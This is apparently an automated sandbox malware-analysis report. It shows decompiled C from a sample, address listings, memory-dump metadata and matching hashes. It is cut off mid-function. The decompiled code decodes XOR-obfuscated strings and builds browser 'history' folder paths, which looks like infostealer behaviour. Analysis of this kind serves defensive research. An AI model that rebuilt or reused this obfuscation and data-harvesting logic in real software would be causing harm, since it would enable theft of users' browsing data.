															} else {
																_t287 = _t328;
																do {
																	 *(_t287 + 0x8b51cc) =  *(_t287 + 0x8b51cc) ^ 0x0000002e;
																	_t287 = _t287 + 1;
																	_t500 = _t287 - 7;
																} while (_t287 < 7);
																goto L65;
															}
														} else {
															_t291 = _t328;
															do {
																 *(_t291 + 0x8b5bf8) =  *(_t291 + 0x8b5bf8) ^ 0x0000002e;
																_t291 = _t291 + 1;
															} while (_t291 < 0xc);
															goto L58;
														}
													} else {
														_t295 = _t328;
														do {
															 *(_t295 + 0x8b5a64) =  *(_t295 + 0x8b5a64) ^ 0x0000002e;
															_t295 = _t295 + 1;
														} while (_t295 < 0xb);
														goto L52;
													}
												} else {
													_t299 = _t328;
													do {
														 *(_t299 + 0x8b51bc) =  *(_t299 + 0x8b51bc) ^ 0x0000002e;
														_t299 = _t299 + 1;
														_t488 = _t299 - 7;
													} while (_t299 < 7);
													goto L46;
												}
											} else {
												_t303 = _t328;
												do {
													 *(_t303 + 0x8b4dac) =  *(_t303 + 0x8b4dac) ^ 0x0000002e;
													_t303 = _t303 + 1;
												} while (_t303 < 8);
												goto L39;
											}
										} else {
											_t308 = _t328;
											do {
												 *(_t308 + 0x8b5e20) =  *(_t308 + 0x8b5e20) ^ 0x0000002e;
												_t308 = _t308 + 1;
											} while (_t308 < 7);
											goto L33;
										}
									} else {
										_t312 = _t328;
										do {
											 *(_t312 + 0x8b4bb8) =  *(_t312 + 0x8b4bb8) ^ 0x0000002e;
											_t312 = _t312 + 1;
											_t476 = _t312 - 0xb;
										} while (_t312 < 0xb);
										goto L27;
									}
								} else {
									_t316 = _t328;
									do {
										 *(_t316 + 0x8b5cc8) =  *(_t316 + 0x8b5cc8) ^ 0x0000002e;
										_t316 = _t316 + 1;
									} while (_t316 < 0xc);
									goto L20;
								}
							} else {
								_t320 = _t328;
								do {
									 *(_t320 + 0x8b5fcc) =  *(_t320 + 0x8b5fcc) ^ 0x0000002e;
									_t320 = _t320 + 1;
								} while (_t320 < 0xb);
								goto L14;
							}
						}
					} else {
						_t324 = _t328;
						do {
							 *(_t324 + 0x8b5da0) =  *(_t324 + 0x8b5da0) ^ 0x0000002e;
							_t324 = _t324 + 1;
						} while (_t324 < 0xb);
						goto L7;
					}
				}
			}








































































                                    0x00822431
                                    0x00822433
                                    0x00822433
                                    0x0082243a
                                    0x00821d48
                                    0x00821d4c
                                    0x00821d4e
                                    0x00821d53
                                    0x00821d5a
                                    0x00821d61
                                    0x00821d67
                                    0x00821d6b
                                    0x00821d74
                                    0x00821d7b
                                    0x00821d80
                                    0x00821d87
                                    0x00821d88
                                    0x00821d8a
                                    0x00821d97
                                    0x00821d98
                                    0x00821d99
                                    0x00821d9b
                                    0x00821d9c
                                    0x00821da1
                                    0x00821da8
                                    0x00821dad
                                    0x00821db0
                                    0x00821db0
                                    0x00821d88
                                    0x00821db8
                                    0x00821dc9
                                    0x00821dc9
                                    0x00821dcf
                                    0x00821ddd
                                    0x0082244d
                                    0x00822457
                                    0x0082245c
                                    0x0082245e
                                    0x008226cf
                                    0x008226d5
                                    0x008226e0
                                    0x008226eb
                                    0x008226f5
                                    0x008226fe
                                    0x008226fe
                                    0x00822466
                                    0x00822472
                                    0x00822476
                                    0x0082247d
                                    0x00822481
                                    0x00822492
                                    0x0082249c
                                    0x008224a4
                                    0x008224b1
                                    0x008224c1
                                    0x008224cb
                                    0x008224d1
                                    0x008224d2
                                    0x008224d3
                                    0x008224dd
                                    0x008224e0
                                    0x008224eb
                                    0x008224f6
                                    0x00822501
                                    0x0082250c
                                    0x00822517
                                    0x0082251b
                                    0x00822520
                                    0x00822529
                                    0x0082252b
                                    0x0082252f
                                    0x00822532
                                    0x00822535
                                    0x0082253a
                                    0x0082253d
                                    0x00822541
                                    0x0082254a
                                    0x0082254d
                                    0x00822550
                                    0x00822555
                                    0x00822559
                                    0x0082255e
                                    0x0082256b
                                    0x0082256e
                                    0x00822575
                                    0x00822583
                                    0x00822588
                                    0x0082258c
                                    0x00822593
                                    0x00822595
                                    0x00822599
                                    0x0082259f
                                    0x008225a6
                                    0x008225ab
                                    0x008225b3
                                    0x008225be
                                    0x008225c8
                                    0x008225cd
                                    0x008225d4
                                    0x008225d9
                                    0x008225b3
                                    0x008225da
                                    0x008225e1
                                    0x008225f2
                                    0x008225f2
                                    0x008225f7
                                    0x008225fe
                                    0x00822605
                                    0x0082260b
                                    0x00822613
                                    0x00822618
                                    0x00822620
                                    0x00822622
                                    0x00822625
                                    0x0082262d
                                    0x00822632
                                    0x00822638
                                    0x0082263e
                                    0x00822644
                                    0x00822620
                                    0x00822645
                                    0x0082264c
                                    0x0082265b
                                    0x0082266b
                                    0x00822678
                                    0x00822682
                                    0x00822687
                                    0x00822688
                                    0x0082268c
                                    0x00822690
                                    0x00822692
                                    0x00822692
                                    0x00822694
                                    0x00822695
                                    0x00822696
                                    0x0082269f
                                    0x008226ad
                                    0x008226b8
                                    0x008226c3
                                    0x008226ca
                                    0x00000000
                                    0x0082264e
                                    0x0082264e
                                    0x0082264e
                                    0x00822655
                                    0x00822656
                                    0x00822656
                                    0x00000000
                                    0x0082264e
                                    0x008225e3
                                    0x008225e3
                                    0x008225e5
                                    0x008225e5
                                    0x008225ec
                                    0x008225ed
                                    0x008225ed
                                    0x00000000
                                    0x008225e5
                                    0x00821de3
                                    0x00821de3
                                    0x00821de8
                                    0x00821def
                                    0x00821df6
                                    0x00821dfc
                                    0x00821e06
                                    0x00821e0d
                                    0x00821e12
                                    0x00821e19
                                    0x00821e1a
                                    0x00821e1c
                                    0x00821e29
                                    0x00821e2a
                                    0x00821e2b
                                    0x00821e2d
                                    0x00821e2e
                                    0x00821e33
                                    0x00821e3a
                                    0x00821e3f
                                    0x00821e42
                                    0x00821e42
                                    0x00821e1a
                                    0x00821e4a
                                    0x00821e5b
                                    0x00821e5b
                                    0x00821e77
                                    0x00821e7d
                                    0x00821e83
                                    0x00821e88
                                    0x00821e8d
                                    0x00821e97
                                    0x00821ea1
                                    0x00821eb1
                                    0x00821eb8
                                    0x00821ebd
                                    0x00821ec4
                                    0x00821ec5
                                    0x00821ec7
                                    0x00821ed7
                                    0x00821ed8
                                    0x00821ed9
                                    0x00821eda
                                    0x00821edf
                                    0x00821ee6
                                    0x00821eeb
                                    0x00821eee
                                    0x00821eee
                                    0x00821ec5
                                    0x00821ef6
                                    0x00821f07
                                    0x00821f07
                                    0x00821f18
                                    0x00821f27
                                    0x00821f2c
                                    0x00821f2e
                                    0x00821f31
                                    0x00821f35
                                    0x00821f3a
                                    0x00821f41
                                    0x00821f48
                                    0x00821f4e
                                    0x00821f58
                                    0x00821f5f
                                    0x00821f64
                                    0x00821f6b
                                    0x00821f6c
                                    0x00821f6e
                                    0x00821f7b
                                    0x00821f7c
                                    0x00821f7d
                                    0x00821f7f
                                    0x00821f80
                                    0x00821f85
                                    0x00821f8c
                                    0x00821f91
                                    0x00821f94
                                    0x00821f95
                                    0x00821f95
                                    0x00821f9f
                                    0x00821fb0
                                    0x00821fbc
                                    0x00821fc9
                                    0x00821fd3
                                    0x00821fe0
                                    0x00821fe4
                                    0x00821fef
                                    0x00821ffa
                                    0x00821fff
                                    0x00822005
                                    0x00822009
                                    0x0082200e
                                    0x00822013
                                    0x0082201a
                                    0x00822020
                                    0x0082202a
                                    0x00822031
                                    0x00822036
                                    0x0082203d
                                    0x0082203e
                                    0x00822040
                                    0x0082204d
                                    0x0082204e
                                    0x00822050
                                    0x00822051
                                    0x00822056
                                    0x0082205d
                                    0x00822062
                                    0x00822065
                                    0x00822065
                                    0x0082203e
                                    0x0082206d
                                    0x0082207e
                                    0x0082207e
                                    0x0082209a
                                    0x008220a0
                                    0x008220a6
                                    0x008220ab
                                    0x008220b0
                                    0x008220b7
                                    0x008220c4
                                    0x008220cb
                                    0x008220d0
                                    0x008220d7
                                    0x008220d8
                                    0x008220e5
                                    0x008220ea
                                    0x008220f0
                                    0x008220f5
                                    0x008220fc
                                    0x00822101
                                    0x00822101
                                    0x008220d8
                                    0x00822109
                                    0x0082211a
                                    0x0082211a
                                    0x0082212b
                                    0x0082213a
                                    0x0082213f
                                    0x00822141
                                    0x00822144
                                    0x00822148
                                    0x0082214d
                                    0x00822154
                                    0x0082215a
                                    0x00822164
                                    0x0082216b
                                    0x00822170
                                    0x00822177
                                    0x00822178
                                    0x0082217a
                                    0x00822187
                                    0x00822188
                                    0x0082218a
                                    0x0082218b
                                    0x00822190
                                    0x00822197
                                    0x0082219c
                                    0x0082219f
                                    0x008221a0
                                    0x008221a0
                                    0x008221aa
                                    0x008221bb
                                    0x008221c7
                                    0x008221d4
                                    0x008221de
                                    0x008221eb
                                    0x008221ef
                                    0x008221fa
                                    0x00822205
                                    0x0082220a
                                    0x00822210
                                    0x00822214
                                    0x00822219
                                    0x0082221e
                                    0x00822225
                                    0x0082222c
                                    0x00822232
                                    0x0082223c
                                    0x00822243
                                    0x00822248
                                    0x0082224f
                                    0x00822250
                                    0x00822252
                                    0x0082225f
                                    0x00822260
                                    0x00822261
                                    0x00822263
                                    0x00822264
                                    0x00822269
                                    0x00822270
                                    0x00822275
                                    0x00822278
                                    0x00822278
                                    0x00822250
                                    0x00822280
                                    0x00822291
                                    0x00822291
                                    0x008222ad
                                    0x008222b3
                                    0x008222b9
                                    0x008222be
                                    0x008222c3
                                    0x008222ca
                                    0x008222d1
                                    0x008222de
                                    0x008222e5
                                    0x008222ea
                                    0x008222f1
                                    0x008222f2
                                    0x008222f4
                                    0x00822301
                                    0x00822302
                                    0x00822303
                                    0x00822304
                                    0x00822309
                                    0x00822310
                                    0x00822315
                                    0x00822318
                                    0x00822318
                                    0x008222f2
                                    0x00822320
                                    0x00822331
                                    0x00822331
                                    0x00822342
                                    0x00822351
                                    0x00822356
                                    0x00822358
                                    0x0082235b
                                    0x0082235f
                                    0x00822364
                                    0x0082236b
                                    0x00822371
                                    0x0082237b
                                    0x00822382
                                    0x00822387
                                    0x0082238e
                                    0x0082238f
                                    0x00822391
                                    0x0082239e
                                    0x0082239f
                                    0x008223a1
                                    0x008223a2
                                    0x008223a7
                                    0x008223ae
                                    0x008223b3
                                    0x008223b4
                                    0x008223b4
                                    0x008223be
                                    0x008223cf
                                    0x008223db
                                    0x008223e8
                                    0x008223f2
                                    0x008223ff
                                    0x00822403
                                    0x0082240e
                                    0x00822419
                                    0x0082241e
                                    0x00822424
                                    0x00000000
                                    0x008223c0
                                    0x008223c0
                                    0x008223c2
                                    0x008223c2
                                    0x008223c9
                                    0x008223ca
                                    0x008223ca
                                    0x00000000
                                    0x008223c2
                                    0x00822322
                                    0x00822322
                                    0x00822324
                                    0x00822324
                                    0x0082232b
                                    0x0082232c
                                    0x00000000
                                    0x00822324
                                    0x00822282
                                    0x00822282
                                    0x00822284
                                    0x00822284
                                    0x0082228b
                                    0x0082228c
                                    0x00000000
                                    0x00822284
                                    0x008221ac
                                    0x008221ac
                                    0x008221ae
                                    0x008221ae
                                    0x008221b5
                                    0x008221b6
                                    0x008221b6
                                    0x00000000
                                    0x008221ae
                                    0x0082210b
                                    0x0082210b
                                    0x0082210d
                                    0x0082210d
                                    0x00822114
                                    0x00822115
                                    0x00000000
                                    0x0082210d
                                    0x0082206f
                                    0x0082206f
                                    0x00822071
                                    0x00822071
                                    0x00822078
                                    0x00822079
                                    0x00000000
                                    0x00822071
                                    0x00821fa1
                                    0x00821fa1
                                    0x00821fa3
                                    0x00821fa3
                                    0x00821faa
                                    0x00821fab
                                    0x00821fab
                                    0x00000000
                                    0x00821fa3
                                    0x00821ef8
                                    0x00821ef8
                                    0x00821efa
                                    0x00821efa
                                    0x00821f01
                                    0x00821f02
                                    0x00000000
                                    0x00821efa
                                    0x00821e4c
                                    0x00821e4c
                                    0x00821e4e
                                    0x00821e4e
                                    0x00821e55
                                    0x00821e56
                                    0x00000000
                                    0x00821e4e
                                    0x00821e4a
                                    0x00821dba
                                    0x00821dba
                                    0x00821dbc
                                    0x00821dbc
                                    0x00821dc3
                                    0x00821dc4
                                    0x00000000
                                    0x00821dbc
                                    0x00821db8

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                    • String ID: .$.$.$.$.$.$.$AMAB$AZAM$ZAMA$ZAMA$]YA\$]]YA$`OCK$~O]]$~\AZ
                                    • API String ID: 1208101283-2674794497
                                    • Opcode ID: 8c8ff1147ca04bbfc3e18b5aeb4cade09822a9ce66217585f774138f68b5df18
                                    • Instruction ID: 7abfac914b06da9aaecc2cc6383b877c692bc7540dda784959d734bd02f8ea9a
                                    • Opcode Fuzzy Hash: 8c8ff1147ca04bbfc3e18b5aeb4cade09822a9ce66217585f774138f68b5df18
                                    • Instruction Fuzzy Hash: 3F02E570A047649ECB14EBA8E84ABDDBBB1FF15310F150198F555EB392CBB41AC9CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008204AD Relevance: 20.1, Strings: 15, Instructions: 1382COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E008204AD(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* _t603;
				signed int _t605;
				void* _t606;
				signed int _t608;
				signed int _t618;
				void* _t621;
				void* _t622;
				signed int _t625;
				void* _t628;
				signed int _t639;
				void* _t642;
				void* _t658;
				signed int _t659;
				signed int _t670;
				void* _t675;
				void* _t678;
				intOrPtr _t681;
				intOrPtr _t682;
				void* _t683;
				void* _t684;
				void* _t686;
				signed int _t698;
				signed int _t703;
				intOrPtr _t715;
				void* _t718;
				signed int _t720;
				intOrPtr _t725;
				void* _t727;
				intOrPtr _t729;
				intOrPtr _t730;
				void* _t731;
				void* _t732;
				intOrPtr* _t734;
				signed int _t742;
				signed int _t747;
				signed int _t753;
				signed int _t757;
				signed int _t763;
				signed int _t781;
				void* _t782;
				void* _t798;
				signed int _t799;
				signed int _t810;
				void* _t812;
				void* _t817;
				void* _t820;
				intOrPtr _t823;
				intOrPtr _t824;
				void* _t825;
				void* _t826;
				void* _t828;
				signed int _t840;
				void* _t845;
				intOrPtr _t855;
				signed int _t859;
				void* _t860;
				void* _t862;
				intOrPtr _t867;
				void* _t869;
				signed int _t872;
				intOrPtr _t873;
				void* _t875;
				void* _t876;
				signed int _t879;
				intOrPtr* _t880;
				void* _t888;
				void* _t893;
				void* _t897;
				void* _t901;
				signed int _t911;
				signed int _t912;
				void* _t915;
				void* _t918;
				signed int _t919;
				intOrPtr _t921;
				void* _t924;
				intOrPtr _t946;
				void* _t971;
				void* _t1005;
				void* _t1009;
				void* _t1021;
				intOrPtr _t1022;
				void* _t1035;
				void* _t1042;
				signed int _t1054;
				intOrPtr _t1065;
				void* _t1075;
				void* _t1077;
				void* _t1079;
				void* _t1095;
				signed int _t1129;
				void* _t1133;
				void* _t1145;
				intOrPtr _t1146;
				void* _t1159;
				void* _t1166;
				signed int _t1178;
				intOrPtr _t1189;
				void* _t1199;
				void* _t1201;
				void* _t1204;
				void* _t1205;
				intOrPtr _t1255;
				void* _t1257;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1273;
				signed int _t1275;
				signed int _t1280;
				intOrPtr _t1282;
				signed int _t1284;
				signed int _t1285;
				void* _t1291;
				void* _t1293;
				intOrPtr* _t1294;
				void* _t1296;
				void* _t1337;
				void* _t1339;

				_t1296 = __eflags;
				L00890CFC(0x892e85, __ebx, __ecx, __edx);
				_t1294 = _t1293 - 0x230;
				_push(__ebx);
				 *((intOrPtr*)(_t1291 - 0x10)) = _t1294;
				_t1204 = 5;
				 *(_t1291 - 0x28) = 0;
				 *(_t1291 - 0x18) = 0;
				 *(_t1291 - 0x3c) = 0;
				_t1255 = L00818F5D(0, _t1291 - 0x16c, _t1204);
				_t1205 = 4;
				 *(_t1291 - 4) = 0;
				_t1270 = L00818F5D(0, _t1291 - 0x1c4, _t1205);
				 *(_t1291 - 4) = 1;
				_t603 = E0082E8C7(0, _t1291 - 0x1dc, 0x8b2a8c, _t1255);
				 *(_t1291 - 4) = 2;
				E0082FA3B(_t1291 - 0x54,  *(_t1291 - 0x14), _t603, _t602, "\\");
				_t605 = 3;
				 *(_t1291 - 0x20) = _t605;
				 *(_t1291 - 4) = _t605;
				_t606 = E0082E917(_t1291 - 0xe4, _t1291 - 0x54, _t1296, ".");
				_push(_t1255);
				_push(_t606);
				_push( *(_t1291 - 0x14));
				 *(_t1291 - 4) = 4;
				E0082FA3B(_t1291 - 0x154);
				_t608 = 3;
				 *(_t1291 - 0x28) = _t608;
				E0082DF41(_t1291 - 0xe4);
				E0082DF41(_t1291 - 0x54);
				E0082DF41(_t1291 - 0x1dc);
				E0082DF41(_t1291 - 0x1c4);
				 *(_t1291 - 4) = 0xa;
				E0082DF41(_t1291 - 0x16c);
				_push(E0082D2AE(L00821B5A()));
				E0082E8C7(0, _t1291 - 0x1ac, 0x8b29cc, _t1255);
				 *(_t1291 - 4) = 0xb;
				 *(_t1291 - 0x58) = 0;
				_push( *(_t1291 - 0x58));
				L0082FEC9(_t1291 - 0x1ac);
				 *(_t1291 - 4) = 0xc;
				_t618 = E00813174(0, _t1291 - 0x78, _t1255);
				 *(_t1291 - 4) = 0xb;
				_t908 = _t618;
				L0082DD77(_t1291 - 0x78);
				if(_t618 == 0) {
					L66:
					 *(_t1291 - 0x4c) = 0x475d7e72;
					 *((intOrPtr*)(_t1291 - 0x48)) = 0x415c5e72;
					 *((intOrPtr*)(_t1291 - 0x44)) = 0x4b424748;
					_t946 =  *((intOrPtr*)( *[fs:0x2c]));
					_t621 =  *0x8b535c; // 0x8000002e
					 *((short*)(_t1291 - 0x40)) = 0x2e5d;
					__eflags = _t621 -  *((intOrPtr*)(_t946 + 4));
					if(_t621 >  *((intOrPtr*)(_t946 + 4))) {
						_t908 = 0x8b535c;
						E0086DB91(_t621, 0x8b535c);
						__eflags =  *0x8b535c - 0xffffffff;
						_pop(_t1079);
						if(__eflags == 0) {
							_t1255 = 0x8b52a8;
							_t316 = _t1291 - 0x4c; // 0x475d7e72
							_t1270 = _t316;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsw");
							L0086DFE8(_t1079, __eflags, 0x895b70);
							L0086DB47(0x8b535c);
						}
					}
					__eflags =  *0x8b52b5;
					if( *0x8b52b5 == 0) {
						L72:
						_push(0x8b52a8);
						_t622 = E0082E8C7(_t908, _t1291 - 0x184, 0x8b29cc, _t1255);
						_t949 = _t1291 - 0x1ac;
						__eflags = _t1291 - 0x1ac - _t622;
						if(_t1291 - 0x1ac != _t622) {
							 *(_t1291 - 0x14) = 0;
							_push( *(_t1291 - 0x14));
							E0082E143(_t949, _t622);
						}
						E0082DF41(_t1291 - 0x184);
						 *(_t1291 - 0x14) = 0;
						_push( *(_t1291 - 0x14));
						L0082FEC9(_t1291 - 0x1ac);
						 *(_t1291 - 4) = 0x38;
						_t625 = E00813174(_t908, _t1291 - 0xcc, _t1255);
						 *(_t1291 - 4) = 0xb;
						_t909 = _t625;
						L0082DD77(_t1291 - 0xcc);
						__eflags = _t625;
						if(_t625 == 0) {
							L140:
							E0082DF41(_t1291 - 0x1ac);
							_t628 = E0082DF41(_t1291 - 0x154);
							 *[fs:0x0] =  *((intOrPtr*)(_t1291 - 0xc));
							return _t628;
						} else {
							 *(_t1291 - 0x14) = 0;
							L0082FEC9(_t1291 - 0x1ac);
							 *(_t1291 - 4) = 0x39;
							L00812E70(_t909, _t1291 - 0x10c, _t1291 - 0x1ac, _t1255, _t1270, _t1291 - 0xcc,  *(_t1291 - 0x14));
							L0082DD77(_t1291 - 0xcc);
							E0081A25A(_t1291 - 0xa4, _t1291 - 0x10c);
							_t911 =  *(_t1291 - 0xa4);
							_t1272 =  *(_t1291 - 0xa0);
							 *(_t1291 - 0x58) = _t911;
							 *(_t1291 - 0x80) = _t911;
							 *(_t1291 - 0x7c) = _t1272;
							E0081A25A(_t1291 - 0x194, _t1291 - 0x10c);
							_t963 =  *(_t1291 - 0x190);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0xa4], xmm0");
							 *(_t1291 - 0xa4) =  *(_t1291 - 0xa4) & 0x00000000;
							 *(_t1291 - 0xa0) =  *(_t1291 - 0xa0) & 0x00000000;
							__eflags =  *(_t1291 - 0x190);
							if( *(_t1291 - 0x190) != 0) {
								E008116CB(_t963);
							}
							 *(_t1291 - 4) = 0x3d;
							while(1) {
								__eflags = _t911 -  *(_t1291 - 0xa4);
								if(_t911 ==  *(_t1291 - 0xa4)) {
									break;
								}
								 *(_t1291 - 0x100) = _t911;
								 *(_t1291 - 4) = 0x3e;
								_t639 = E00812A7C(_t911, _t911, _t1255);
								__eflags = _t639;
								if(_t639 == 0) {
									L109:
									 *(_t1291 - 4) = 0x3d;
									_t455 = _t911 + 0x20; // 0x20
									 *(_t1291 - 4) = 0x4b;
									_push(_t455);
									E0082E5D4(_t455, _t1291 - 0x9c);
									 *(_t1291 - 0x18) =  *(_t1291 - 0x18) | 0x10000000;
									 *(_t1291 - 4) = 0x4c;
									_t642 = E0082E917(_t1291 - 0x184, _t1291 - 0x9c, __eflags, "\\history");
									_t912 = 0;
									 *(_t1291 - 4) = 0x4d;
									 *(_t1291 - 0x11c) = 0;
									_push( *(_t1291 - 0x11c));
									L0082FEC9(_t642);
									_pop(_t971);
									 *(_t1291 - 4) = 0x4e;
									L00812E70(0, _t1291 - 0xac, _t642, _t1255, _t1272, _t1291 - 0xcc, _t971);
									L0082DD77(_t1291 - 0xcc);
									E0082DF41(_t1291 - 0x184);
									E0082DF41(_t1291 - 0x9c);
									E0081A25A(_t1291 - 0xf4, _t1291 - 0xac);
									_t1255 =  *((intOrPtr*)(_t1291 - 0xf4));
									_t1273 =  *(_t1291 - 0xf0);
									 *((intOrPtr*)(_t1291 - 0xec)) = _t1255;
									 *(_t1291 - 0xe8) = _t1273;
									 *((intOrPtr*)(_t1291 - 0xf4)) = 0;
									 *(_t1291 - 0xf0) = 0;
									E0081A25A(_t1291 - 0x18c, _t1291 - 0xac);
									_t978 =  *(_t1291 - 0x188);
									asm("xorps xmm0, xmm0");
									asm("movlpd [ebp-0xb4], xmm0");
									 *(_t1291 - 0xb4) = 0;
									 *((intOrPtr*)(_t1291 - 0xb0)) = 0;
									__eflags =  *(_t1291 - 0x188);
									if( *(_t1291 - 0x188) != 0) {
										E008116CB(_t978);
									}
									 *(_t1291 - 4) = 0x54;
									while(1) {
										__eflags = _t1255 - _t912;
										if(_t1255 == _t912) {
											break;
										}
										 *(_t1291 - 0x138) = _t912;
										_push( *(_t1291 - 0x138));
										L0082FEFB();
										 *(_t1291 - 4) = 0x55;
										_t1257 = _t1255 + 0x20;
										_t658 = E00812425(_t1257, _t1291 - 0x184);
										__eflags =  *((intOrPtr*)(_t1291 - 0x64)) - 8;
										_t986 =  >=  ?  *((void*)(_t1291 - 0x78)) : _t1291 - 0x78;
										_t659 = E0081226D(_t658,  >=  ?  *((void*)(_t1291 - 0x78)) : _t1291 - 0x78,  *((intOrPtr*)(_t1291 - 0x68)));
										_t1278 = _t659;
										L0082DD77(_t1291 - 0x184);
										 *(_t1291 - 4) = 0x54;
										L0082DD77(_t1291 - 0x78);
										__eflags = _t659;
										if(__eflags != 0) {
											L130:
											E00812EBB(_t912, _t1291 - 0xec, _t1257, _t1278, __eflags);
											_t1273 =  *(_t1291 - 0xe8);
											_t1255 =  *((intOrPtr*)(_t1291 - 0xec));
											continue;
										}
										 *(_t1291 - 0x84) = _t912;
										_push( *(_t1291 - 0x84));
										L0082FEC9(_t1291 - 0x154);
										 *(_t1291 - 4) = 0x56;
										E00813225(_t912, _t1291 - 0xcc, _t1291 - 0x154, _t1257);
										 *(_t1291 - 4) = 0x54;
										L0082DD77(_t1291 - 0xcc);
										 *(_t1291 - 0x13c) = _t912;
										_push( *(_t1291 - 0x13c));
										L0082FEC9(_t1291 - 0x154);
										_pop(_t996);
										 *(_t1291 - 4) = 0x57;
										E0082E5D4(_t1257, _t1291 - 0x9c);
										_t1278 =  *(_t1291 - 0x3c) | 0x00000080;
										 *(_t1291 - 0x3c) = _t1278;
										 *(_t1291 - 0x104) = _t912;
										_push( *(_t1291 - 0x104));
										 *(_t1291 - 4) = 0x58;
										L0082FEC9(_t1291 - 0x9c);
										_pop(_t999);
										 *(_t1291 - 4) = 0x59;
										_t670 = E00813139(_t912, _t1291 - 0xcc, _t1291 - 0x134, _t1257);
										L0082DD77(_t1291 - 0xcc);
										E0082DF41(_t1291 - 0x9c);
										 *(_t1291 - 4) = 0x54;
										L0082DD77(_t1291 - 0x134);
										__eflags = _t670;
										if(_t670 == 0) {
											L129:
											_t912 = 0;
											__eflags = 0;
											goto L130;
										}
										__eflags =  *((intOrPtr*)(_t1291 - 0x140)) - 0x10;
										_t1005 = _t1257;
										_t915 =  >=  ?  *((void*)(_t1291 - 0x154)) : _t1291 - 0x154;
										_t675 = E008123EB(_t1005, _t1291 - 0x23c);
										_push(_t1005);
										 *(_t1291 - 4) = 0x5a;
										E0082E5D4(_t675, _t1291 - 0x134);
										_t1280 = _t1278 | 0x00001000;
										 *(_t1291 - 0x3c) = _t1280;
										_t1009 =  *(_t1291 - 0x100) + 0x20;
										 *(_t1291 - 4) = 0x5b;
										_t678 = E008123EB(_t1009, _t1291 - 0x224);
										_push(_t1009);
										 *(_t1291 - 4) = 0x5c;
										E0082E5D4(_t678, _t1291 - 0x9c);
										 *(_t1291 - 0x3c) = _t1280 | 0x00008000;
										 *(_t1291 - 4) = 0x5d;
										 *(_t1291 - 0x20) = 0x677d7e72;
										 *((short*)(_t1291 - 0x1c)) = 0x2e72;
										_t1282 =  *((intOrPtr*)( *[fs:0x2c]));
										_t681 =  *0x8b4fa0; // 0x0
										__eflags = _t681 -  *((intOrPtr*)(_t1282 + 4));
										if(_t681 >  *((intOrPtr*)(_t1282 + 4))) {
											E0086DB91(_t681, 0x8b4fa0);
											__eflags =  *0x8b4fa0 - 0xffffffff;
											_pop(_t1035);
											if(__eflags == 0) {
												_t544 = _t1291 - 0x20; // 0x677d7e72
												 *0x8b603c =  *_t544;
												 *0x8b6040 =  *((intOrPtr*)(_t1291 - 0x1c));
												L0086DFE8(_t1035, __eflags, 0x895b18);
												 *_t1294 = 0x8b4fa0;
												L0086DB47();
											}
										}
										__eflags =  *0x8b6041;
										if( *0x8b6041 == 0) {
											L122:
											_t682 =  *0x8b5620; // 0x0
											 *((intOrPtr*)(_t1291 - 0x38)) = 0x4c4c4f64;
											 *((intOrPtr*)(_t1291 - 0x34)) = 0x2e725c4b;
											__eflags = _t682 -  *((intOrPtr*)(_t1282 + 4));
											if(_t682 >  *((intOrPtr*)(_t1282 + 4))) {
												E0086DB91(_t682, 0x8b5620);
												__eflags =  *0x8b5620 - 0xffffffff;
												if(__eflags == 0) {
													_t551 = _t1291 - 0x38; // 0x4c4c4f64
													_t552 = _t1291 - 0x34; // 0x2e725c4b
													 *0x8b52b8 =  *_t551;
													 *0x8b52bc =  *_t552;
													L0086DFE8( *_t552, __eflags, 0x895b26);
													 *_t1294 = 0x8b5620;
													L0086DB47();
												}
											}
											__eflags =  *0x8b52bf;
											if( *0x8b52bf == 0) {
												L128:
												_t683 = E0082E9EC(_t915, _t1291 - 0x20c, 0x8b52b8);
												 *(_t1291 - 4) = 0x5e;
												_t684 = E0082E917(_t1291 - 0x1f4, _t683, __eflags, 0x8b603c);
												 *(_t1291 - 4) = 0x5f;
												E0082FA3B(_t1291 - 0xcc,  *(_t1291 - 0x14), _t684, _t1291 - 0x9c, 0x8b2abc);
												_t1284 =  *(_t1291 - 0x3c) | 0x00040000;
												 *(_t1291 - 0x3c) = _t1284;
												 *(_t1291 - 4) = 0x60;
												_t686 = E0082E917(_t1291 - 0x184, _t1291 - 0xcc, __eflags, "\\history\\");
												 *(_t1291 - 4) = 0x61;
												_push(_t1291 - 0x134);
												_push(_t686);
												_push( *(_t1291 - 0x14));
												_t1021 = _t1291 - 0x78;
												E0082FA3B(_t1021);
												_t1278 = _t1284 | 0x00080000;
												 *(_t1291 - 0x3c) = _t1284 | 0x00080000;
												 *(_t1291 - 4) = 0x62;
												__eflags =  *((intOrPtr*)(_t1291 - 0x64)) - 0x10;
												_push(_t1021);
												_t1232 =  >=  ?  *((void*)(_t1291 - 0x78)) : _t1291 - 0x78;
												_push(_t1021);
												_t1022 =  *0x8b4804; // 0x1346140
												E008183DF(_t1022,  >=  ?  *((void*)(_t1291 - 0x78)) : _t1291 - 0x78, _t915);
												_t1294 = _t1294 + 0xc;
												E0082DF41(_t1291 - 0x78);
												E0082DF41(_t1291 - 0x184);
												E0082DF41(_t1291 - 0xcc);
												E0082DF41(_t1291 - 0x1f4);
												E0082DF41(_t1291 - 0x20c);
												E0082DF41(_t1291 - 0x9c);
												L0082DD77(_t1291 - 0x224);
												E0082DF41(_t1291 - 0x134);
												 *(_t1291 - 4) = 0x54;
												L0082DD77(_t1291 - 0x23c);
												goto L129;
											} else {
												_t698 = 0;
												__eflags = 0;
												do {
